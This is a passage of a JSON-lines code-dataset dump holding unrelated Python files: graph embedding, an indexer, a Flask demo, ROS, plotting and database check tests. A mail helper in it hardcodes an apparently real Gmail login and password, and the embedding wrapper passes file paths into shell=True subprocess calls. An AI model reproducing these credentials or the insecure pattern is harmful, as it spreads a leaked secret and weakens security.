removed_nodes=removed_nodes, graph_nodes=graph.nodes())\n os.remove(target_emb_path_file)\n\n @staticmethod\n def __get_preprocessed_edge_list(graph: g.Graph, mem_acc: ma.MemoryAccess, removed_nodes: [int]) -> str:\n edge_list_file_path = mem_acc.access_edge_list_file_path(graph_name=str(graph), removed_nodes=removed_nodes,\n edge_list=graph.edges())\n\n path_name = os.path.splitext(edge_list_file_path)[0]\n directed_weighted_edge_list = path_name + \".directedWeightedEdgelist\"\n dense_edge_list = path_name + \".denseEdgelist\"\n\n if os.path.exists(dense_edge_list):\n print(\"dense edge list already exists\")\n return dense_edge_list\n\n if not os.path.exists(edge_list_file_path):\n raise ValueError(f\"Edge list does not exist: {edge_list_file_path}\")\n\n working_dir = os.getcwd()\n os.chdir(config.LINE_DIR)\n subprocess.call(f'python preprocess_youtube.py \"{edge_list_file_path}\" \"{directed_weighted_edge_list}\"',\n shell=True)\n\n if not os.path.exists(directed_weighted_edge_list):\n raise ValueError(f\"Directed weighted edge list could not be computed. Target file: {edge_list_file_path}\")\n\n subprocess.call(\n f'./reconstruct -train \"{directed_weighted_edge_list}\" -output \"{dense_edge_list}\" '\n f'-depth 2 -threshold 1000',\n shell=True)\n os.chdir(working_dir)\n os.remove(directed_weighted_edge_list)\n\n if not os.path.exists(dense_edge_list):\n raise ValueError(f\"Dense edge list could not be computed. Target file {dense_edge_list}\")\n\n return dense_edge_list\n\n def __train_embedding(self, dense_edge_list_file_path: str, graph: g.Graph, mem_acc: ma.MemoryAccess,\n removed_nodes: List[int]) -> str:\n target_file_path = mem_acc.get_embedding_path_name(emb_func_name=str(self), graph_name=str(graph),\n removed_nodes=removed_nodes)\n\n target_emb_path_file = target_file_path + \".emb\"\n\n first_order_emb = target_file_path + \"_order_1.emb\"\n second_order_emb = target_file_path + \"_order_2.emb\"\n norm_first_order_emb = target_file_path + \"_order_1_normalised.emb\"\n norm_second_order_emb = target_file_path + \"_order_2_normalised.emb\"\n\n # execute embedding\n working_dir = os.getcwd()\n os.chdir(config.LINE_DIR)\n assert (os.path.exists(dense_edge_list_file_path))\n\n subprocess.call(\n f'./line -train \"{dense_edge_list_file_path}\" -output \"{first_order_emb}\" -size \\\n {str(self.dim / 2)} -order 1 -binary 1 -threads {config.NUM_CORES}',\n shell=True)\n subprocess.call(\n f'./line -train \"{dense_edge_list_file_path}\" -output \"{second_order_emb}\" -size \\\n {str(self.dim / 2)} -order 2 -binary 1 -threads {config.NUM_CORES}',\n shell=True)\n subprocess.call(f'./normalize -input \"{first_order_emb}\" -output \"{norm_first_order_emb}\" -binary 1',\n shell=True)\n subprocess.call(f'./normalize -input \"{second_order_emb}\" -output \"{norm_second_order_emb}\" -binary 1',\n shell=True)\n subprocess.call(\n f'./concatenate -input1 \"{norm_first_order_emb}\" -input2 \"{norm_second_order_emb}\" '\n f'-output \"{target_emb_path_file}\" -binary 1',\n shell=True)\n os.chdir(working_dir)\n\n assert (os.path.exists(target_emb_path_file))\n\n # remove unnecessary files to save memory\n os.remove(first_order_emb)\n os.remove(second_order_emb)\n os.remove(norm_first_order_emb)\n os.remove(norm_second_order_emb)\n\n return target_emb_path_file\n","sub_path":"main/entities/embeddings/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":6096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"593158050","text":"from smtplib import *\nimport smtplib\ndef send_mail_to(rcpt,msg):\n\tserver = smtplib.SMTP()\n\tprint (\"Defined server\")\n\tserver.connect(\"smtp.gmail.com\",587) # connecting to gmail smtp server .\n\tprint (\"Connected\")\n\tserver.ehlo()\t\n\tserver.starttls()\t#Starting tls security \n\tserver.ehlo()\t\n\tserver.login(\"e.complaint.NIT@gmail.com\",'123@qwerty') #will login to account\n\tprint (\"Logined\")\n\tserver.sendmail('e.complaint.NIT@gmail.com',rcpt,msg) # will send to message\n\tprint(\"Sent\")\n\tserver.quit()","sub_path":"complaint/send_mail_to_reciept.py","file_name":"send_mail_to_reciept.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"353990980","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n\n@app.route('/')\n@app.route('/strona_a')\ndef strona_a():\n return render_template('index3a.html')\n\n\n@app.route('/strona_b')\ndef strona_b():\n wpis = request.args.get('wpis')\n if wpis:\n print(wpis)\n return render_template('index3b.html')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"Python - advanced/zajecia06/template3.py","file_name":"template3.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"453422182","text":"import pickle\nimport math\nimport numpy as np\nfrom nltk.corpus import wordnet\n# DO NOT MODIFY CLASS NAME\nclass Indexer:\n # DO NOT MODIFY THIS SIGNATURE\n # You can change the internal implementation as you see fit.\n def __init__(self, config):\n self.inverted_idx = {}\n self.postingDict = {}\n self.docs_index = {}\n self.config = config\n self.flag = \"\"\n\n\n # DO NOT MODIFY THIS SIGNATURE\n # You can change the internal implementation as you see fit.\n def add_new_doc(self, document):\n \"\"\"\n This function perform indexing process for a document object.\n Saved information is captures via two dictionaries ('inverted index' and 'posting')\n :param document: a document need to be indexed.\n :return: -\n \"\"\"\n\n document_dictionary = document.term_doc_dictionary\n maximum = 0\n if len(document_dictionary) > 0:\n maximum = max(document_dictionary.values())\n self.docs_index[int(document.tweet_id)] = [maximum,len(document_dictionary),document.tokenized_text,0]\n # Go over each term in the doc\n for term in document_dictionary.keys():\n try:\n # Update inverted index and posting\n try:\n tf = document_dictionary[term]\n except:\n tf = 0\n if term not in self.inverted_idx.keys():\n self.inverted_idx[term] = [1, document_dictionary[term]]\n self.postingDict[term] = [[int(document.tweet_id),document_dictionary[term]]]#{int(document.tweet_id):[\n else:\n self.inverted_idx[term][0] += 1\n self.inverted_idx[term][1] += document_dictionary[term]\n self.postingDict[term].append([int(document.tweet_id),document_dictionary[term]])\n\n #self.postingDict[term].append((document.tweet_id, document_dictionary[term]))\n\n except:\n print(term)\n print('problem with the following key {}'.format(term[0]))\n\n # DO NOT MODIFY THIS SIGNATURE\n # You can change the internal implementation as you see fit.\n def load_index(self, fn):\n \"\"\"\n Loads a pre-computed index (or indices) so we can answer queries.\n Input:\n fn - file name of pickled index.\n \"\"\"\n f = open(fn, \"rb\")\n lst = pickle.load(f)\n return lst\n\n\n # DO NOT MODIFY THIS SIGNATURE\n # You can change the internal implementation as you see fit.\n def save_index(self, fn):\n \"\"\"\n Saves a pre-computed index (or indices) so we can save our work.\n Input:\n fn - file name of pickled index.\n \"\"\"\n\n new_docs = {}\n for doc in self.docs_index:\n new_docs[doc] = self.docs_index[doc][:4]\n f = open(fn, \"wb\")\n pickle.dump([self.inverted_idx,self.postingDict,new_docs],f)\n\n # feel free to change the signature and/or implementation of this function\n # or drop altogether.\n def _is_term_exist(self, term):\n \"\"\"\n Checks if a term exist in the dictionary.\n \"\"\"\n return term in self.postingDict\n\n # feel free to change the signature and/or implementation of this function \n # or drop altogether.\n def get_term_posting_list(self, term):\n \"\"\"\n Return the posting list from the index for a term.\n \"\"\"\n return self.postingDict[term] if self._is_term_exist(term) else []\n\n\n\n def optimize(self):\n \"\"\"\n remove from the inverted index too rare words\n :return:\n \"\"\"\n new_dict = {}\n for key in self.inverted_idx:\n if self.inverted_idx[key][1] > 10 and self.inverted_idx[key][0] > 10:\n new_dict[key] = self.inverted_idx[key]\n self.inverted_idx = new_dict\n\n def calculate_weigths(self):\n \"\"\"\n calculate the weight of terms in senntence according to BM-25\"\"\n :return:\n \"\"\"\n sum_len = 0\n for i in self.docs_index:\n sum_len += len(self.docs_index[i][2])\n avg = sum_len/len(self.docs_index)\n k = 1.2\n b = 0.1\n for term in self.inverted_idx:\n idf = math.log(len(self.docs_index) / self.inverted_idx[term][0], 2)\n for doc in self.postingDict[term]:\n doc_len = len(self.docs_index[doc[0]][2])\n norm = 1 - b + b*(doc_len/avg)\n w = idf * (((k+1)*doc[1])/(k*norm+doc[1]))\n doc.append(w)\n self.docs_index[doc[0]][3] += (w**2)\n\n\n def calculate_average_vector(self,model):\n \"\"\"\n caclculating the average vector of each doc using word2vec model\n :param model:\n :return:\n \"\"\"\n for doc in self.docs_index:\n vec = []\n for term in self.docs_index[doc][2]:\n try:\n vec.append(model.wv[term])\n except:\n continue\n if len(vec) == 0:\n vec = []\n vec = np.add.reduce(vec)\n vec /= len(self.docs_index[doc][2])\n self.docs_index[doc][2] = vec\n\n\n def get_syns(self):\n \"\"\"\n get the synonyms of each word using wordnet model\n :return:\n \"\"\"\n for doc in self.docs_index:\n syns = []\n text = self.docs_index[doc][2]\n for word in text:\n w = wordnet.synsets(word)\n if len(w) > 0:\n syns.append(wordnet.synsets(word)[0])\n self.docs_index[doc].append(syns)\n","sub_path":"indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"116380075","text":"\"\"\" This module receive a mp4 file in the same directory as input\n output will be a folder of extracted frames and a wav file for audio\n that has the same name as the input\n Input: video name that in the same directory\n Output: exported WAV file and a folder of image frames\"\"\"\n\nimport os\nimport moviepy.editor as mp\nimport cv2\n\n\ndef video_input(name):\n \"\"\"Extract audio file and images frame from user video\"\"\"\n # make sure that the file exists\n try:\n test = open(name + \".mp4\")\n except IOError:\n print(\"File not accessible\")\n finally:\n test.close()\n\n # Extract the audio into wav file\n audio = mp.AudioFileClip(name + \".mp4\")\n audio.write_audiofile('./userData/' + name + \".wav\")\n\n # Create a VideoCapture object\n cam = cv2.VideoCapture(name + \".mp4\")\n\n try:\n # creating a folder named data\n if not os.path.exists(\"userData/frames\"):\n os.makedirs(\"userData/frames\")\n\n # if not created then raise error\n except OSError:\n print('Error: Creating directory of frames')\n\n # Check if camera opened successfully\n if cam.isOpened() is False:\n print(\"Unable to read camera feed\")\n\n # frame\n current_frame = 0\n while True:\n\n # reading from frame\n ret, frame = cam.read()\n\n if ret:\n # if video is still left continue creating images\n frame_name = './' + 'userData/frames' + '/frame' + str(current_frame) + '.jpg'\n # print('Creating...' + frameName)\n\n # writing the extracted images\n cv2.imwrite(frame_name, frame)\n\n # increasing counter so that it will\n # show how many frames are created\n current_frame += 1\n else:\n break\n\n # When everything done, release the video capture and video write objects\n # cam.release()\n\n # Closes all the frames\n cv2.destroyAllWindows()\n","sub_path":"Felinemotion/video_input.py","file_name":"video_input.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"52608860","text":"import numpy as np\nimport matplotlib.pyplot as plt\n# import simu.deconv as simu\nimport simu.doa as simu\nimport fcts.lasso as lasso\nimport fcts.blasso as blasso\n\n\nM = 101\nN = 50\nK = 5\nSNR=np.inf\nlambda_lambdaMax = .1\n\nnp.random.seed(1)\n\n(theta_y,x_y,y) = simu.signal(K,M,SNR)\n\ntheta_A = simu.grid(N)\nA = simu.atoms(theta_A,M)\n\nlambdaMax = np.linalg.norm(A.T@y,np.inf)\n\nlambda_ = lambda_lambdaMax*lambdaMax\nL = np.linalg.eigvals(A.T.conj()@A)\nL = np.max(L)\n\nxinit = np.zeros((N,1))\nmaxIter = 200\ntol = 1.e-6\ndisp = True\n\n\n'''\nFista\n'''\nx_lasso = lasso.fista( y , A , xinit , lambda_ , L , maxIter , tol , disp )\n\n\n'''\nFW-blasso\n'''\n(param_FW_blasso, x_FW_blasso) = blasso.FW( y , A , theta_A , lambda a:simu.atoms(a,M) , simu.Bounds().T , lambda_ , maxIter , tol , disp )\n\n\n\n'''\nSFW-blasso\n'''\n(param_SFW_blasso, x_SFW_blasso) = blasso.SFW( y , A , theta_A , lambda a:simu.atoms(a,M) , simu.Bounds().T , lambda_ , maxIter , tol , disp )\n\n\nplt.figure()\n\nplt.plot(theta_y.T,np.abs(x_y),'x')\nplt.plot(theta_A.T,np.abs(x_lasso))\nplt.plot(param_FW_blasso.T,np.abs(x_FW_blasso),'o')\nplt.plot(param_SFW_blasso.T,np.abs(x_SFW_blasso),'o')\nplt.legend(('GT','fista','FW','SFW'))\nplt.show()\n","sub_path":"blasso-master/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"191827582","text":"import rospy\nfrom sensor_msgs.msg import Joy\nfrom geometry_msgs.msg import Twist, PoseStamped, Pose\nimport csv\n\n\npose = PoseStamped()\n\ndef joyCallback(msg):\n\tglobal pose,test_writer \n\tpose_pub = rospy.Publisher('bebop/captured_pose', PoseStamped, queue_size=10)\t\n\twith open('test.csv', mode='a') as test_file:\n\t\ttest_writer = csv.writer(test_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t\tif msg.buttons[2] == 1:\n\t\t\ttest_writer.writerow([pose.pose.position.x, pose.pose.position.y, pose.pose.position.z])\n\t\t\tpose_pub.publish(pose)\n\t\t\trospy.sleep(0.25)\n\ndef poseCallback(msg):\n\tglobal pose\n\tpose = msg\n\ndef main():\n\trospy.init_node('spacepoints', anonymous=False)\t\t\n\trospy.Subscriber('/vrpn_client_node/bebop/pose',PoseStamped,poseCallback)\n\trospy.Subscriber('/bebop/joy',Joy, joyCallback)\n\t\n\tglobal test_writer\n\trospy.spin()\n\t\n\nif __name__ == '__main__':\n\tmain()","sub_path":"flight_points.py","file_name":"flight_points.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"125255977","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author : AL\n\nimport logging\n\n\ndef allot_logger_just_show(name, level=None, fmt=None):\n '''\n 初始化一个logger\n :param name: logger名称\n :param fmt: 日志格式\n :param level: 日志的严重程度\n :return:\n '''\n if level == None:\n level = logging.DEBUG\n if fmt == None:\n fmt = '%(asctime)s : %(message)s'\n datefmt = '%Y-%m-%d %H:%M:%S'\n logger = logging.getLogger(name)\n if not logger.handlers:\n logger.setLevel(level)\n\n con_handler = logging.StreamHandler()\n con_handler.setLevel(logging.DEBUG)\n con_handler.setFormatter(logging.Formatter(fmt, datefmt))\n\n logger.handlers = [con_handler]\n\n\ndef allot_logger(name, filename, level=None, fmt=None):\n '''\n 初始化一个logger\n :param name: logger名称\n :param filename: 日志文件路径\n :param fmt: 日志格式\n :param level: 日志的严重程度\n :return:\n '''\n if level == None:\n level = logging.DEBUG\n if fmt == None:\n fmt = '%(asctime)s - %(module)s.%(funcName)s - %(levelname)s [line:%(lineno)d]: %(message)s'\n datefmt = '%Y-%m-%d %H:%M:%S'\n logger = logging.getLogger(name)\n if not logger.handlers:\n logger.setLevel(level)\n\n con_handler = logging.StreamHandler()\n con_handler.setLevel(logging.DEBUG)\n con_handler.setFormatter(logging.Formatter(fmt, datefmt))\n\n file_handler = logging.FileHandler(filename)\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(logging.Formatter(fmt, datefmt))\n\n logger.handlers = [con_handler, file_handler]\n\n\nallot_logger('Pspider', '..\\Report\\Report.log', level=logging.ERROR)\nallot_logger_just_show(\"monitor\", level=logging.DEBUG)\n\n\ndef get_logger():\n return logging.getLogger('Pspider')\n\n\ndef get_monitor_logger():\n return logging.getLogger('monitor')\n\nreport_logger = get_logger()\nmontion_logger = get_monitor_logger()\n\nif __name__ == '__main__':\n report_logger.info(\"test_info\")\n report_logger.error(\"test_error\")\n montion_logger.info(\"test_info\")\n montion_logger.error(\"test_error\")\n pass\n","sub_path":"component/logger_config.py","file_name":"logger_config.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"553540738","text":"# -*- coding: utf-8 -*-\n\n# Nakresli blokovy diagram vyhrivani podkrovi z krbovych kamen.\n\nfrom schema.canvas import Path\nfrom schema.canvas import Canvas\nfrom schema.canvas import Circle\nfrom schema.canvas import Line\nfrom schema.canvas import Square\nfrom schema.vector import Transform\nfrom schema.vector import I\n\nGS = 12.0 # zakladni velikost nejakeho domneleho gridu\n\n# equilateral_triangle\nEQ_TRIANGLE_H = 0.866 # height of the triangle\nEQ_TRIANGLE_R = 0.289 # The radius of the inscribed circle\nEQ_TRIANGLE = Transform().move((EQ_TRIANGLE_R - EQ_TRIANGLE_H, 0)).transform_points([\n (0.0, 0.0),\n (EQ_TRIANGLE_H, 0.5),\n (EQ_TRIANGLE_H, -0.5),\n (0.0, 0.0)\n])\n\n# Schematicka znacka smesovaciho ventilu\nMIX_VALVE = Transform().scale(0.5).transform_points([\n (0.0, 0.0),\n (EQ_TRIANGLE_H, 0.5),\n (EQ_TRIANGLE_H, -0.5),\n (-EQ_TRIANGLE_H, 0.5),\n (-EQ_TRIANGLE_H, -0.5),\n (0.0, 0.0),\n (0.5, -EQ_TRIANGLE_H),\n (-0.5, -EQ_TRIANGLE_H),\n (0.0, 0.0)\n])\n\n# Schematicka znacka cerpadla\ncircle = Circle()\ntriangle = Line(Transform().scale(0.70).transform_points(EQ_TRIANGLE))\n\n# Krbova kamna\ndef write_heater(canvas, transf = I):\n if canvas is not None:\n t = I.scale(2.0, 3.0).transform(transf)\n symbol = Square(t)\n symbol.write(canvas)\n return transf.r_move(-1.0, 0.0), transf.r_move(1.0, 0.0)\n\ndef write_pump(canvas, transf = I):\n if canvas is not None:\n symbol = Circle(transf)\n symbol.write(canvas)\n t = I.scale(-0.6, 0.6).transform(transf)\n symbol = Line(EQ_TRIANGLE, t)\n symbol.write(canvas)\n return transf.r_move(-0.5, 0.0), transf.r_move(0.5, 0.0)\n\ndef write_mix_valve(canvas, transf = I):\n if canvas is not None:\n symbol = Line(MIX_VALVE, transf)\n symbol.write(canvas)\n return transf.r_move(-0.5, 0.0), transf.r_move(0.5, 0.0), transf.rotate_vect().r_move(0.5, 0.0)\n\ndef write_corner(canvas, transf = I):\n if canvas is not None:\n symbol = Line(((-0.5, 0.0), (0.0, 0.0), (0.0, -0.5)), transf)\n symbol.write(canvas)\n return transf.r_move(-0.5, 0.0), transf.rotate_vect().r_move(0.5, 0.0)\n\ndef write_radiator(canvas, transf = I):\n if canvas is not None:\n symbol = Square(I.scale(2.0, 3.0).transform(transf))\n symbol.write(canvas)\n return transf.r_move(-1.0, 0.0), transf.r_move(1.0, 0.0)\n\ndef write_tee2(canvas, t1, t2):\n p1x, p1y = t1.transform_point((0.0, 0.0))\n v1x, v1y = t1.transform_vector((-1.0, 0.0))\n p2x, p2y = t2.transform_point((0.0, 0.0))\n v2x, v2y = t2.transform_vector((-1.0, 0.0))\n ox = p1x * v2x + p2x * v1x\n oy = p1y * v2y + p2y * v1y\n t = t1.move_to((ox, oy))\n symbol = Line(((-0.5, 0.0), (0.5, 0.0), (0.0, 0.0), (0.0, -0.5)), t)\n symbol.write(canvas)\n return t.move(t.transform_vector((1.5, 0.0)))\n\ndef write_tee(canvas, t = I):\n if canvas is not None:\n symbol = Line(((-0.5, 0.0), (0.5, 0.0), (0.0, 0.0), (0.0, -0.5)), t)\n symbol.write(canvas)\n return t.r_move(-0.5, 0.0), t.r_move(0.5, 0.0), t.rotate_vect().r_move(0.5, 0.0)\n\ndef write_wire(canvas, t = I, scale = 1.0):\n if canvas is not None:\n Line([(0.0, 0.0), (1.0 * scale, 0.0)], t).write(canvas)\n return t, t.r_move(1.0 * scale, 0.0)\n\ndef get_t(write_fn, t1, i = 0):\n t2 = write_fn(None, t1)[i]\n x1, y1 = t1.get_offset()\n x2, y2 = t2.get_offset()\n dx, dy = x1 - x2, y1 - y2\n return t1.move((dx, dy))\n\n\n# Nakresli\ncanvas = Canvas()\ntransform = I\nt1, t2, t3 = write_mix_valve(canvas, I)\ncanvas.text('=KKB-MV', t2.r_move(0.0, 1.0).get_offset(), 'n')\n_, t2 = write_wire(canvas, t2)\n_, t2 = write_pump(canvas, get_t(write_pump, t2))\ncanvas.text('=KKB-P', t2.r_move(0.0, 1.0).get_offset(), 'n')\n_, t2 = write_corner(canvas, get_t(write_corner, t2))\n_, t2 = write_wire(canvas, t2, 0.25)\n_, t2 = write_radiator(canvas, get_t(write_radiator, t2))\ncanvas.text('=OT', t2.get_offset(), 'se')\n_, t2 = write_wire(canvas, t2, 0.25)\n_, t2 = write_corner(canvas, get_t(write_corner, t2))\n_, t2 = write_wire(canvas, t2, -t3.get_offset()[1] + t2.get_offset()[0] - 1.0)\n_, t2, t3 = write_tee(canvas, get_t(write_tee, t2))\nwrite_wire(canvas, t3, 2.5)\n_, t2 = write_wire(canvas, t2, 1.0)\n_, t2, t3 = write_mix_valve(canvas, get_t(write_mix_valve, t2))\ncanvas.text('=KKA-MV', t2.r_move(0.0, 1.0).get_offset(), 's')\n_, t2 = write_wire(canvas, t2)\n_, t2 = write_pump(canvas, get_t(write_pump, t2))\ncanvas.text('=KKA-P', t2.r_move(0.0, 1.0).get_offset(), 's')\n_, t2 = write_corner(canvas, get_t(write_corner, t2))\n_, t2 = write_wire(canvas, t2, 0.25)\n_, t2 = write_heater(canvas, get_t(write_heater, t2))\ncanvas.text('=KK', t2.get_offset(), 'nw')\n_, t2 = write_wire(canvas, t2, 0.25)\n_, t2 = write_corner(canvas, get_t(write_corner, t2))\n_, t2 = write_wire(canvas, t2, 2.0)\n_, t2, t3 = write_tee(canvas, t2.move_to((t3.get_offset()[0], t2.get_offset()[1])))\nwrite_wire(canvas, t3, 2.5)\n_, t2 = write_wire(canvas, t2, 1.0)\n\n\n#transform, t2 = write_mix_valve(canvas, transform)\n#transform = write_pump(canvas, transform)\n#transform = write_corner(canvas, transform)\n#transform = write_radiator(canvas, transform)\n#transform = write_corner(canvas, transform)\n#transform = write_tee(canvas, transform, t2)\n#transform, t2 = write_mix_valve(canvas, transform)\n#transform = write_pump(canvas, transform)\n#transform = write_corner(canvas, transform)\n#transform = write_heater(canvas, transform)\n#transform = write_corner(canvas, transform)\n","sub_path":"book/script/blockdiagram.py","file_name":"blockdiagram.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"494631182","text":"# -*- coding: UTF8 -*-\n\nimport platform.TestCase\nfrom check.rdb import rdb_common_check\nRIGHT_ARROW = [2, 4, 8, 2048, 4096]\nLEFT_ARROW = [16, 32, 64, 128, 8192]\n\n\nclass CCheckGuideInfoLaneInlinkidValidate(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = self.pg.GetDropFKeyStr('rdb_guideinfo_lane_in_link_id_fkey', 'rdb_guideinfo_lane')\n sqlcmd = sqlcmd + \\\n \"\"\"\n ALTER TABLE rdb_guideinfo_lane\n ADD CONSTRAINT rdb_guideinfo_lane_in_link_id_fkey FOREIGN KEY (in_link_id)\n REFERENCES rdb_link (link_id) MATCH FULL\n ON UPDATE NO ACTION ON DELETE NO ACTION;\n \"\"\"\n\n if self.pg.execute(sqlcmd) == -1:\n return False\n else :\n return True\n\n\nclass CCheckGuideInfoLaneNodeidValiadate(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = self.pg.GetDropFKeyStr('rdb_guideinfo_lane_node_id_fkey', 'rdb_guideinfo_lane')\n sqlcmd = sqlcmd + \\\n \"\"\"\n ALTER TABLE rdb_guideinfo_lane\n ADD CONSTRAINT rdb_guideinfo_lane_node_id_fkey FOREIGN KEY (node_id)\n REFERENCES rdb_node (node_id) MATCH FULL\n ON UPDATE NO ACTION ON DELETE NO ACTION;\n \"\"\"\n\n if self.pg.execute(sqlcmd) == -1:\n return False\n else :\n return True\n\n\nclass CCheckGuideInfoLaneOutlinkidValidate(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = self.pg.GetDropFKeyStr('rdb_guideinfo_lane_out_link_id_fkey', 'rdb_guideinfo_lane')\n sqlcmd = sqlcmd + \\\n \"\"\"\n ALTER TABLE rdb_guideinfo_lane\n ADD CONSTRAINT rdb_guideinfo_lane_out_link_id_fkey FOREIGN KEY (out_link_id)\n REFERENCES rdb_link (link_id) MATCH FULL\n ON UPDATE NO ACTION ON DELETE NO ACTION;\n \"\"\"\n if self.pg.execute(sqlcmd) == -1:\n return False\n else:\n return True\n\n\nclass CCheckGuideInfoLaneTotalLaneNumValidate(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n ALTER TABLE rdb_guideinfo_lane DROP CONSTRAINT if exists check_lane_num;\n ALTER TABLE rdb_guideinfo_lane\n ADD CONSTRAINT check_lane_num CHECK (lane_num <= 16 AND lane_num >= 1);\n \"\"\"\n if self.pg.execute(sqlcmd) == -1:\n return False\n else:\n return True\n\n\nclass CCheckGuideInfoLaneLeftChangeLane(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n ALTER TABLE rdb_guideinfo_lane DROP CONSTRAINT if exists check_lane_num_l;\n ALTER TABLE rdb_guideinfo_lane\n ADD CONSTRAINT check_lane_num_l CHECK (lane_num_l >= (-7) AND lane_num_l <= 7);\n \"\"\"\n if self.pg.execute(sqlcmd) == -1:\n return False\n else:\n return True\n\n\nclass CCheckGuideInfoLaneRightChangeLane(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n ALTER TABLE rdb_guideinfo_lane DROP CONSTRAINT if exists check_lane_num_r;\n ALTER TABLE rdb_guideinfo_lane\n ADD CONSTRAINT check_lane_num_r CHECK (lane_num_r >= (-7) AND lane_num_r <= 7);\n \"\"\"\n if self.pg.execute(sqlcmd) == -1:\n return False\n else:\n return True\n\n\nclass CCheckGuideLaneInlinkTileSame(platform.TestCase.CTestCase):\n def _do(self):\n checkobject = rdb_common_check.\\\n CCheckItemTileIDSame(self.pg, 'rdb_guideinfo_lane', 'in_link_id', 'in_link_id_t')\n return checkobject.do()\n\n\nclass CCheckGuideLaneNodeTileSame(platform.TestCase.CTestCase):\n\n def _do(self):\n checkobject = rdb_common_check.\\\n CCheckItemTileIDSame(self.pg, 'rdb_guideinfo_lane', 'node_id', 'node_id_t')\n return checkobject.do()\n\n\nclass CCheckGuideLaneOutlinkTileSame(platform.TestCase.CTestCase):\n def _do(self):\n checkobject = rdb_common_check.\\\n CCheckItemTileIDSame(self.pg, 'rdb_guideinfo_lane', 'out_link_id', 'out_link_id_t')\n return checkobject.do()\n \nclass CCheckGuideLanePasslinkCnt(rdb_common_check.CCheckPassLinkCountWithGuideidParam):\n def __init__(self, suite, caseinfo):\n rdb_common_check.CCheckPassLinkCountWithGuideidParam.__init__(self, suite, caseinfo, 'lane_tbl', 'passlink_cnt')\n pass\n\n\nclass CCheckGuideLaneInLinkOutLinkEqual(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n select count(*) from rdb_guideinfo_lane where in_link_id = out_link_id\n \"\"\"\n return 0 == self.pg.getOnlyQueryResult(sqlcmd)\n\n\nclass CCheckGuideLaneExtendFlag(platform.TestCase.CTestCase):\n def _do(self):\n checkobject = rdb_common_check.\\\n CCheckNodeExtendFlag(self.pg, 'rdb_guideinfo_lane', 6)\n return checkobject.do()\n\n\nclass CCheckGuideLanePathCnt(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n select *\n from\n (\n SELECT gid, id, nodeid, inlinkid, outlinkid, array_upper(regexp_split_to_array(passlid, E'\\\\|+'),1) as lenth, passlink_cnt,\n lanenum, laneinfo, arrowinfo, lanenuml, lanenumr, buslaneinfo\n FROM lane_tbl\n )as a\n where a.lenth <> passlink_cnt;\n \"\"\"\n self.pg.execute(sqlcmd)\n if len(self.pg.fetchall()) > 0:\n return False\n else:\n return True\n\n\nclass CCheckGuideLanePathLinkRe(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n SELECT regexp_split_to_array(passlid, E'\\\\|+') as passlinks\n FROM lane_tbl\n \"\"\"\n self.pg.execute(sqlcmd)\n rows = self.pg.fetchall()\n for row in rows:\n len1 = len(row[0])\n lent2 = len(set(row[0]))\n if len1 != lent2:\n return False\n return True\n\nclass CCheckGuideLaneNodeForwarded(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n select f.node_id\n from (\n select c.node_id\n from(\n select unnest(nodes) as node_id\n from(\n SELECT inlinkid, array_agg(passlink_cnt) as a,array_agg( distinct nodeid) as nodes\n FROM lane_tbl\n group by inlinkid\n ) as b\n where 0 <> all(a)\n ) as c\n left join link_tbl as d\n on c.node_id = d.s_node or c.node_id = d.e_node\n ) as f\n group by f.node_id having count(*) < 3\n \"\"\"\n self.pg.execute(sqlcmd)\n rows = self.pg.fetchall()\n if len(rows) > 0:\n return False\n else:\n return True\n\n\nclass CCheckGuideLaneArrowInfo(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n SELECT lane_num, lane_info, arrow_info,in_link_id,out_link_id\n FROM rdb_guideinfo_lane;\n \"\"\"\n self.pg.execute(sqlcmd)\n rows = self.pg.fetchall()\n length = len(rows)\n normal_sum = 0\n exception_sum = 0\n if length > 0:\n for row in rows:\n lane_num = row[0]\n lane_info = row[1]\n arrow_info = row[2]\n left_lane = pow(2, lane_num - 1)\n er_left_value = False\n er_right_value = False\n rt_left_value = False\n rt_right_value = False\n if left_lane <= lane_info:\n er_left_value = \\\n self._arrow_in_list(arrow_info, RIGHT_ARROW)\n rt_left_value = \\\n self._arrow_in_list(arrow_info, LEFT_ARROW)\n\n if (lane_info % 2) != 0:\n er_right_value = \\\n self._arrow_in_list(arrow_info, LEFT_ARROW)\n rt_right_value = 